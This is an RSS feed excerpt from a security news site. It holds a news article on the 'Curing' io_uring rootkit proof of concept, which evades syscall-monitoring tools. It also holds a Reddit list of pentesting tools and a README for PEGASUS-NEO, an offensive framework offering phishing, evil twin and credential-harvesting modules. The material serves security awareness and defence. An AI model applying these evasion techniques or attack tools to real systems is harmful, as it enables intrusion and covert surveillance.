				<div class="et_pb_text_inner"><h4><span><strong>Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.</strong></span></h4>
<p><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" class="alignnone wp-image-276050 size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png" alt="" width="800" height="120" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw"></a></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_8  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="" data-start="1571" data-end="1602"><strong>How the Curing Rootkit Works</strong></h2>
<p class="" data-start="1604" data-end="1896">Developed by security researchers at ARMO, the <strong data-start="1651" data-end="1669">Curing rootkit</strong> establishes a covert communication channel between an infected system and a command-and-control (C2) server. Commands are fetched and executed — all without using the system calls that runtime security tools typically monitor.</p>
<p class="" data-start="1898" data-end="2120">Instead, the rootkit achieves functionality using <code data-start="1948" data-end="1958">io_uring</code>, keeping its activity beneath the radar of tools like <strong data-start="2013" data-end="2022">Falco</strong> and <strong data-start="2027" data-end="2039">Tetragon</strong>, both of which rely heavily on system call hooking to detect malicious behavior.</p>
<p><span class="01pfI8AQtq7HO34jB2XfToSN87uarkv2dlzs9Ub0UpMERxYvceYROkh6Z3GCGhDwCdzHSZ4VagcWJ6Vnomr9imeiyqTxFBK"></span></p>
<hr class="" data-start="2122" data-end="2125">
<h2 class="" data-start="2127" data-end="2161"><strong>Security Tools Caught Off Guard</strong></h2>
<p class="" data-start="2163" data-end="2322">In ARMO’s <a href="https://www.armosec.io/blog/io_uring-rootkit-bypasses-linux-security/" target="_blank" rel="noopener">assessment</a>, <strong data-start="2185" data-end="2256">leading Linux runtime detection solutions are “blind” to the attack</strong>, because they assume visibility through syscall monitoring alone.</p>
<p class="" data-start="2324" data-end="2569">“<strong data-start="2325" data-end="2424">This mechanism allows a user application to perform various actions without using system calls,</strong>” ARMO explained in its report. “As a result, security tools relying on system call monitoring are blind to rootkits working solely on io_uring.”</p>
<p class="" data-start="2571" data-end="2950">Amit Schendel, Head of Security Research at ARMO, emphasized the larger issue: “Many vendors take the most straightforward path: hooking directly into system calls. While this approach offers quick visibility, it comes with limitations. Most notably, system calls aren’t always guaranteed to be invoked. io_uring, which can bypass them entirely, is a positive and great example.”</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_9 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/integrating-metasploit-with-beef-framework-for-advanced-post-exploitation-attacks/" target="_blank" rel="noopener noreferrer">Integrating Metasploit with BeEF Framework for advanced post-exploitation attacks<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_10  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News Adsense Adcode Horizontal --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_11 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/radar/" target="_blank" rel="noopener">Recon Tool: RADAR<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_12  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<h2 class="" data-start="2957" data-end="3015"><strong>Warnings from Google and the Broader Security Community</strong></h2>
<p class="" data-start="3017" data-end="3282">The risks of io_uring are not unknown. In <strong data-start="3059" data-end="3072">June 2023</strong>, Google publicly <a href="https://security.googleblog.com/2023/06/learnings-from-kctf-vrps-42-linux.html" target="_blank" rel="noopener">disclosed</a> its decision to <strong data-start="3116" data-end="3140">limit io_uring usage</strong> across <strong data-start="3148" data-end="3207">Android, ChromeOS, and internal production environments</strong>, citing the feature’s ability to “provide strong exploitation primitives.”</p>
<p class="" data-start="3284" data-end="3486">Despite being a legitimate and performance-oriented Linux enhancement, io_uring has become an attractive vector for advanced persistence mechanisms — and now, as Curing demonstrates, rootkit deployment.</p>
<hr class="" data-start="3488" data-end="3491">
<h2 class="" data-start="3493" data-end="3534"><strong>What’s Next for Linux Runtime Defense?</strong></h2>
<p class="" data-start="3536" data-end="3802">The Curing PoC is a wake-up call for defenders relying solely on syscall tracing for runtime visibility. It underscores the growing need for <strong data-start="3677" data-end="3719">deeper inspection of kernel structures</strong>, alternative monitoring paths, and awareness of less conventional attack surfaces.</p>
<p class="" data-start="3804" data-end="3981">As Linux continues to evolve, security tools must evolve with it — or risk being outpaced by the attackers already taking advantage of the next generation of stealth techniques.</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_13 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/mitre-warns-of-cve-funding-crisis-as-contract-expires-april-16/" target="_blank" rel="noopener noreferrer">MITRE Warns of CVE Funding Crisis as Contract Expires April 16</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_14  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote>
<p><em>Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? </em><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p>
</blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><em>Source: thehackernews.com</em></strong></p>
<p><a href="https://thehackernews.com/2025/04/linux-iouring-poc-rootkit-bypasses.html" target="_blank" rel="noopener"><strong>Source Link</strong></a></p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_1 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_1 store-img">
				
				
				
				
				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1142" height="500" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png" alt="Merch" title="Store" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png 1142w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-980x429.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-480x210.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1142px, 100vw" class="wp-image-271829"></span></a>
			</div><div class=" et_pb_logo_slider  et_pb_logo_slider_0 ">
                
            </div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_0 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/fake-booking-com-emails-trick-hotel-staff-into-installing-asyncrat-via-fake-captcha/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/04/877x440-Images-for-the-News-posts-32-1-300x150.png" alt="Fake Booking.com Emails Trick Hotel Staff into Installing AsyncRAT via Fake CAPTCHA" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/fake-booking-com-emails-trick-hotel-staff-into-installing-asyncrat-via-fake-captcha/" target="_self">Fake Booking.com Emails Trick Hotel Staff into Installing AsyncRAT via Fake CAPTCHA</a></h3><time class="rpwe-time published" datetime="2025-04-22T12:29:23+02:00">April 22, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/over-16000-fortinet-devices-compromised-with-stealth-symlink-backdoor/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/04/877x440-Images-for-the-News-posts-32-300x150.png" alt="Over 16,000 Fortinet Devices Compromised with Stealth Symlink Backdoor" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/over-16000-fortinet-devices-compromised-with-stealth-symlink-backdoor/" target="_self">Over 16,000 Fortinet Devices Compromised with Stealth Symlink Backdoor</a></h3><time class="rpwe-time published" datetime="2025-04-17T11:27:17+02:00">April 17, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/mitre-warns-of-cve-funding-crisis-as-contract-expires-april-16/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/04/877x440-Images-for-the-News-posts-31-300x150.png" alt="MITRE Warns of CVE Funding Crisis as Contract Expires April 16" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/mitre-warns-of-cve-funding-crisis-as-contract-expires-april-16/" target="_self">MITRE Warns of CVE Funding Crisis as Contract Expires April 16</a></h3><time class="rpwe-time published" datetime="2025-04-16T10:38:26+02:00">April 16, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/hertz-confirms-data-breach-after-cleo-zero-day-attack-by-clop-ransomware-gang/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/04/877x440-Images-for-the-News-posts-30-300x150.png" alt="Hertz Confirms Data Breach After Cleo Zero-Day Attack by Clop Ransomware Gang" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/hertz-confirms-data-breach-after-cleo-zero-day-attack-by-clop-ransomware-gang/" target="_self">Hertz Confirms Data Breach After Cleo Zero-Day Attack by Clop Ransomware Gang</a></h3><time class="rpwe-time published" datetime="2025-04-15T10:50:45+02:00">April 15, 2025</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="et_pb_widget widget_block"><h3>EXPLORE OUR STORE</h3></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="233" height="300" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Tshirt-233x300.png" class="image wp-image-280999  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="300" height="280" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/RedTeamers-e1725807706904-300x280.png" class="image wp-image-281001  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="711" height="1024" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Hoodie-711x1024.png" class="image wp-image-281002  attachment-large size-large" alt=""></a></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"> <!-- News Adsense Adcode --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_1 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/new-linux-rootkit-curing-exploits-io_uring-to-evade-system-call-monitoring/">New Linux Rootkit ‘Curing’ Exploits io_uring to Evade System Call Monitoring</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Top Penetration Testing Tools for Ethical Hackers]]></title>
<description><![CDATA[If you're into penetration testing, you know that the right tools can make all the difference. Whether you're performing reconnaissance, scanning, exploitation, or post-exploitation tasks, having a solid toolkit is essential. Here are some of the best penetration testing tools that every ethical ...]]></description>
<link>https://tsecurity.de/de/2741833/it-security-nachrichten/top-penetration-testing-tools-for-ethical-hackers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2741833/it-security-nachrichten/top-penetration-testing-tools-for-ethical-hackers/</guid>
<pubDate>Fri, 25 Apr 2025 01:04:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>If you're into penetration testing, you know that the right tools can make all the difference. Whether you're performing reconnaissance, scanning, exploitation, or post-exploitation tasks, having a solid toolkit is essential. Here are some of the best penetration testing tools that every ethical hacker should have:</p> <p>1️⃣ Reconnaissance &amp; Information Gathering</p> <p>Recon-ng – Web-based reconnaissance automation</p> <p>theHarvester – OSINT tool for gathering emails, domains, and subdomains</p> <p>Shodan – The search engine for hackers, useful for identifying exposed systems</p> <p>SpiderFoot – Automated reconnaissance with OSINT data sources</p> <p>2️⃣ Scanning &amp; Enumeration</p> <p>Nmap – The gold standard for network scanning</p> <p>Masscan – Faster alternative to Nmap for large-scale scanning</p> <p>Amass – Advanced subdomain enumeration</p> <p>Nikto – Web server scanner for vulnerabilities</p> <p>3️⃣ Exploitation Tools</p> <p>Metasploit Framework – The most popular exploitation toolkit</p> <p>SQLmap – Automated SQL injection detection and exploitation</p> <p>XSSer – Detect and exploit XSS vulnerabilities</p> <p>RouterSploit – Exploit framework focused on routers and IoT devices</p> <p>4️⃣ Password Cracking</p> <p>John the Ripper – Fast and customizable password cracker</p> <p>Hashcat – GPU-accelerated password recovery</p> <p>Hydra – Brute-force tool for various protocols</p> <p>CrackMapExec – Post-exploitation tool for lateral movement in networks</p> <p>5️⃣ Web &amp; Network Security Testing</p> <p>Burp Suite – Must-have for web penetration testing</p> <p>ZAP (OWASP) – Open-source alternative to Burp Suite</p> <p>Wireshark – Network packet analysis and sniffing</p> <p>Bettercap – Advanced network attacks &amp; MITM testing</p> <p>6️⃣ Privilege Escalation &amp; Post-Exploitation</p> <p>LinPEAS / WinPEAS – Windows &amp; Linux privilege escalation automation</p> <p>Mimikatz – Extract credentials from Windows memory</p> <p>BloodHound – AD enumeration and privilege escalation pathfinding</p> <p>Empire – Post-exploitation and red teaming framework</p> <p>7️⃣ Wireless &amp; Bluetooth Testing</p> <p>Aircrack-ng – Wireless network security assessment</p> <p>WiFite2 – Automated wireless auditing tool</p> <p>BlueMaho – Bluetooth device exploitation</p> <p>Bettercap – MITM and wireless attacks</p> <p>8️⃣ Mobile &amp; Cloud Security</p> <p>MobSF – Mobile app security framework</p> <p>APKTool – Reverse engineering Android applications</p> <p>CloudBrute – Find exposed cloud assets</p> <p>9️⃣ Fuzzing &amp; Exploit Development</p> <p>AFL++ – Advanced fuzzing framework</p> <p>Radare2 – Reverse engineering toolkit</p> <p>Ghidra – NSA-developed reverse engineering tool</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/VistaSec"> /u/VistaSec </a> <br> <span><a href="https://www.reddit.com/r/ComputerSecurity/comments/1j2bj3d/top_penetration_testing_tools_for_ethical_hackers/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ComputerSecurity/comments/1j2bj3d/top_penetration_testing_tools_for_ethical_hackers/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More]]></title>
<description><![CDATA[____                                  _   _                              |  _ \ ___  __ _  __ _ ___ _   _ ___| \ | |                             | |_) / _ \/ _` |/ _` / __| | | / __|  \| |                             |  __/  __/ (_| | (_| \__ \ |_| \__ \ |\  |                             |_|   \_...]]></description>
<link>https://tsecurity.de/de/2740989/it-security-tools/pegasus-neo-a-comprehensive-penetration-testing-framework-designed-for-security-professionals-and-ethical-hackers-it-combines-multiple-security-tools-and-custom-modules-for-reconnaissance-exploitation-wireless-attacks-web-hacking-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2740989/it-security-tools/pegasus-neo-a-comprehensive-penetration-testing-framework-designed-for-security-professionals-and-ethical-hackers-it-combines-multiple-security-tools-and-custom-modules-for-reconnaissance-exploitation-wireless-attacks-web-hacking-and-more/</guid>
<pubDate>Thu, 24 Apr 2025 15:51:24 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Pg4OzrdxqTLbNnfRVpQ-PKPD1tku-PGAtT_-Lg8Tln_wD3_yhZpbVoWdnfpFK4c5UZM-p4VUJxIelSh_CuG1At1JQHSgbpuQ99BHkd-NLjMQBsieAO2gVlPXBm1-Xa4cqrf5pe0KjERFbdd8a2kemJuS7fp34sMe_zcT_QEPD1sDO1R6MYJXpbA_V70/s1280/httpsgithubcomsobri3195pegasus-neoblobmainreadmemd.png" imageanchor="1"><img border="0" data-original-height="640" data-original-width="1280" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Pg4OzrdxqTLbNnfRVpQ-PKPD1tku-PGAtT_-Lg8Tln_wD3_yhZpbVoWdnfpFK4c5UZM-p4VUJxIelSh_CuG1At1JQHSgbpuQ99BHkd-NLjMQBsieAO2gVlPXBm1-Xa4cqrf5pe0KjERFbdd8a2kemJuS7fp34sMe_zcT_QEPD1sDO1R6MYJXpbA_V70/w640-h320/httpsgithubcomsobri3195pegasus-neoblobmainreadmemd.png" width="640"></a></div><br><p><br></p><pre><code>                              ____                                  _   _ <br>                             |  _ \ ___  __ _  __ _ ___ _   _ ___| \ | |<br>                             | |_) / _ \/ _` |/ _` / __| | | / __|  \| |<br>                             |  __/  __/ (_| | (_| \__ \ |_| \__ \ |\  |<br>                             |_|   \___|\__, |\__,_|___/\__,_|___/_| \_|<br>                                       |___/                             <br>                                 ███▄    █ ▓█████  ▒█████  <br>                                 ██ ▀█   █ ▓█   ▀ ▒██▒  ██▒<br>                                ▓██  ▀█ ██▒▒███   ▒██░  ██▒<br>                                ▓██▒  ▐▌██▒▒▓█  ▄ ▒██   ██░<br>                                ▒██░   ▓██░░▒████▒░ ████▓▒░<br>                                ░ ▒░   ▒ ▒ ░░ ▒░ ░░ ▒░▒░▒░ <br>                                ░ ░░   ░ ▒░ ░ ░  ░  ░ ▒ ▒░ <br>                                   ░   ░ ░    ░   ░ ░ ░ ▒  <br>                                         ░    ░  ░    ░ ░<br></code></pre> <h1>PEGASUS-NEO Penetration Testing Framework</h1> <p><a href="https://github.com/sobri3195/LICENSE" rel="nofollow" target="_blank" title="PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more. (1)"></a> </p> <h2>🛡️ Description</h2> <p>PEGASUS-NEO is a comprehensive penetration testing <a href="https://www.kitploit.com/search/label/Framework" target="_blank" title="framework">framework</a> designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> attacks, web hacking, and more.</p> <h2>⚠️ Legal Disclaimer</h2> <p>This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.</p> <p>Developers assume no liability and are not responsible for any misuse or damage caused by this program.</p> <h2>🔒 Copyright Notice</h2> <pre><code>PEGASUS-NEO - Advanced Penetration Testing Framework<br>Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.<br><br>This software is proprietary and confidential. Unauthorized copying, transfer, or<br>reproduction of this software, via any medium is strictly prohibited.<br><br>Written by Letda Kes dr. Sobri &lt;muhammadsobrimaulana31@gmail.com&gt;, January 2024<br></code></pre> <h2>🌟 Features</h2> <p><strong>Password: Sobri</strong></p> <ul> <li><strong>Reconnaissance &amp; OSINT</strong></li> <li>Network scanning</li> <li>Email harvesting</li> <li>Domain enumeration</li> <li> <p>Social media <a href="https://www.kitploit.com/search/label/Tracking" target="_blank" title="tracking">tracking</a></p> </li> <li> <p><strong>Exploitation &amp; Pentesting</strong></p> </li> <li>Automated exploitation</li> <li>Password attacks</li> <li>SQL injection</li> <li> <p>Custom payload generation</p> </li> <li> <p><strong>Wireless Attacks</strong></p> </li> <li>WiFi cracking</li> <li>Evil twin attacks</li> <li> <p>WPS exploitation</p> </li> <li> <p><strong>Web Attacks</strong></p> </li> <li>Directory scanning</li> <li>XSS detection</li> <li>SQL injection</li> <li> <p>CMS <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a></p> </li> <li> <p><strong>Social Engineering</strong></p> </li> <li>Phishing templates</li> <li>Email spoofing</li> <li> <p>Credential harvesting</p> </li> <li> <p><strong>Tracking &amp; <a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="Analysis">Analysis</a></strong></p> </li> <li>IP geolocation</li> <li>Phone number tracking</li> <li>Email analysis</li> <li>Social media hunting</li> </ul> <h2>🔧 Installation</h2> <pre><code># Clone the repository<br>git clone https://github.com/sobri3195/pegasus-neo.git<br><br># Change directory<br>cd pegasus-neo<br><br># Install dependencies<br>sudo python3 -m pip install -r requirements.txt<br><br># Run the tool<br>sudo python3 pegasus_neo.py<br></code></pre> <h2>📋 Requirements</h2> <ul> <li>Python 3.8+</li> <li>Linux Operating System (Kali/Ubuntu recommended)</li> <li>Root privileges</li> <li>Internet connection</li> </ul> <h2>🚀 Usage</h2> <ol> <li>Start the tool:</li> </ol> <pre><code>sudo python3 pegasus_neo.py<br></code></pre> <ol> <li>Enter authentication password</li> <li>Select category from main menu</li> <li>Choose specific tool or module</li> <li>Follow on-screen instructions</li> </ol> <h2>🔐 Security Features</h2> <ul> <li>Source code protection</li> <li>Integrity checking</li> <li>Anti-tampering mechanisms</li> <li>Encrypted storage</li> <li>Authentication system</li> </ul> <h2>🛠️ Supported Tools</h2> <h3>Reconnaissance &amp; OSINT</h3> <ul> <li>Nmap</li> <li>Wireshark</li> <li>Maltego</li> <li>Shodan</li> <li>theHarvester</li> <li>Recon-ng</li> <li>SpiderFoot</li> <li>FOCA</li> <li>Metagoofil</li> </ul> <h3>Exploitation &amp; Pentesting</h3> <ul> <li>Metasploit</li> <li>SQLmap</li> <li>Commix</li> <li>BeEF</li> <li>SET</li> <li>Hydra</li> <li>John the Ripper</li> <li>Hashcat</li> </ul> <h3>Wireless Hacking</h3> <ul> <li>Aircrack-ng</li> <li>Kismet</li> <li>WiFite</li> <li>Fern Wifi Cracker</li> <li>Reaver</li> <li>Wifiphisher</li> <li>Cowpatty</li> <li>Fluxion</li> </ul> <h3>Web Hacking</h3> <ul> <li>Burp Suite</li> <li>OWASP ZAP</li> <li>Nikto</li> <li>XSStrike</li> <li>Wapiti</li> <li>Sublist3r</li> <li>DirBuster</li> <li>WPScan</li> </ul> <h2>📝 Version History</h2> <ul> <li>v1.0.0 (2024-01) - Initial release</li> <li>v1.1.0 (2024-02) - Added tracking modules</li> <li>v1.2.0 (2024-03) - Added tool installer</li> </ul> <h2>👥 Contributing</h2> <p>This is a proprietary project and contributions are not accepted at this time.</p> <h2>🤝 Support</h2> <p>For support, please email muhammadsobrimaulana31@gmail.com atau https://lynk.id/muhsobrimaulana</p> <h2>⚖️ License</h2> <p>This project is protected under proprietary license. See the LICENSE file for details.</p> <p>Made with ❤️ by Letda Kes dr. Sobri </p><br><br><div><b><span><a class="kiploit-download" href="https://github.com/sobri3195/pegasus-neo" rel="nofollow" target="_blank" title="Download Pegasus-Neo">Download Pegasus-Neo</a></span></b></div>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,20ms -->